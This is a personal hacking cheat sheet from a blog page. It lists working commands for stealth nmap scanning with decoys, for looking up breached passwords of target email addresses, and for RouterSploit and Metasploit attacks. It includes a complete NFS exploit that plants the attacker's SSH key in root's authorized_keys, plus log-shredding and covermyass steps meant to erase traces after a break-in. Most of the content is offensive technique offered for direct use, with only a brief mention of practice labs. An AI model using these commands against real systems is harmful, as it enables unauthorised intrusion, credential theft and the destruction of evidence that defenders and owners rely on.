badd10de.dev

Hacking


Hacking tools

nmap

Used for network reconnaissance, port exploration, OS exploration or vulnerability exploration.

# Show TCP ports for a domain, ip, or range
nmap -sT domain.name.com.or.ip

# Similar to the command above but tries to be stealthy
nmap -sS domain.name.com.or.ip

# Perform aggressive scan
sudo nmap -A domain.name.com.or.ip

# Try to identify the OS of network machines
sudo nmap -O domain.name.com.or.ip

# Try to get the version number of the open applications
sudo nmap -sV domain.name.com.or.ip

# Run vulnerability analysis on all machines of the network
sudo nmap -sV -p21-8080 --script vulners 192.168.1.1/24

# Use decoy IP and MAC addresses to be extra stealthy (Sometimes using mac
# spoofing or too many decoys will make the analysis fail).
sudo nmap -O domain.name.com.or.ip -D RND:5 --spoof-mac 01:02:03:04:05:06

# Perform a service scan with a UDP scan and drop the initial ping.
sudo nmap -sS -sU -PN 192.168.1.1

Sherlock

Can be used to explore the social networks that a given person is a member of.

python3 sherlock username

h8mail

This tool can be used to explore a password database breach to find available passwords for one or more given email adresses.

# Query a single target
h8mail -t target@example.com

# Query a single target with a local breach dump
h8mail -t user@email.com -lb '/path/to/breach/compilation/directory'

# Query a list of targets without API calls against the Breach Compilation.
h8mail -t targets.txt -bc /path/to/breach/compilation/directory -sk

Shodan

Shodan is a search engine for vulnerable internet connected devices. Using it we can potentially find webcams, satellite telephones, etc. In some cases, they could be unsecured or use a simple user/password combination.

Racoon Scanner

A high performance offensive security tool for reconnaissance and vulnerability scanning. Similar to nmap but it offers more exhaustive analysis and extensive reporting capabilities.

raccoon domain.name.com

RouterSploit

Try to find and exploit vulnerabilities in routers and embedded devices with the RouterSploit framework.

# Start the framework
python3 rsf.py

# Try autopwn
use scanners/autopwn
show options
set target 192.168.1.1
run

If the analysis has found vulnerabilities, the exploit can be ran with:

use exploits/reported/exploit/path
set target 192.181.1.1
check
run

To find target devices, we can search open ports with nmap:

nmap -p 80,8080,8081,81 192.168.1.0/24

Metasploit

Framework for exploring and exploiting vulnerabilities.

A typical approach would be to:

  1. Perform exploration of a particular remote/local system to find vulnerabilities.
  2. Try get shell access.
  3. Create a meterpreter session.
  4. Perform privilege escalation or exploit the current user permissions.
  5. Post exploitation, might include clearing tracks (Changing or shredding /var/log, .bash_history, .zsh_history), installing a keylogger or backdoor, uploading and running viruses, download files, take webcam picures/videos, etc.

Common vulnerabilities

rhosts misconfiguration

If the .rhosts file is misconfigured with “+ +” and the ports 512(exec),513(login),514(shell) are opoen, we can just login using rsh-client without user/password with:

rlogin -l root ip.or.domain.name

Exposed NFS filesystems

If port 2049 is open, this can mean that NFS is active on the target machine.

# Check rpc info to identify NFS
rpcinfo -p ip.or.domain.name

# Show what is being mounted, hopefully the / share (`/ *`)
showmount -e ip.or.domain.name

# Exploit this by mounting the root filesystem and adding our key to the
# authorized ssh keys for root. Note that for extra protection we could create
# a new ssh key for each attack instead of using the default one, that could give
# us away.
mount -t nfs ip.or.domain.name:/ /mnt
cat ~/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys
umount /mnt
ssh root@ip.or.domain.name

Backdoors

If we can tamper with some connection oriented services, we could insert a backdoor that allows us to connect without anyone noticing. For example, in metasploitable2 there is a doctored vsftpd service that opens a backdoor if the username ends with the :) sequence, opening a listening shell on port 6200.

Web services

Very often we can find vulnerable web services, be it because of misconfiguration, default admin passwords, or just vulnerable to the common attacks that web apps are susceptible of. We can practice these with metasploitable2 on the multillidae web application.

Searching for vulnerabilities

There are different search engines and databases that we can use to try to find active vulnerabilities.

Tools

Searchsploit

In linux we can use the tool Searchsploit to download offline reports of vulnerabilities.

searchsploit kernel 2.6 linux | sort -n

It is important to read through the code of the exploits instead of blindly running things you find on the internet.

Post exploitation

Removing log files

Some interesting log files that we want to get rid of rm -rf filename, truncate truncate -s 0 filename, shred shred -zu filename, or even zeroing a file cat /dev/null > filename:

/var/log/auth.log
/var/log/cron.log
/var/log/maillog
/var/log/httpd

There are some specified tools for this purpose, like covermyass:

-URL: https://github.com/sundowndev/go-covermyass

wget "https://github.com/sundowndev/go-covermyass/releases/download/v0.2/go-covermyass_Linux_x86_64.tar.gz"
tar xfv go-covermyass.tar.gz
chmod +x go-covermyass
./go-covermyass

Privilege scalation

Linux

If you manage to get a shell to the target machine, there are several things you can do to try to get root. First of all, do some local research:

You can gather more intel about running serices and versions of software to try detect the attack surface.

At this stage you can use searchsploit to try to find vulnerabilities on the kernel, privileged services or anything that caught your attention.

Because simple solutions are always better, try get more info from:

Sometimes complicated things can pay off also!

Windows

Resources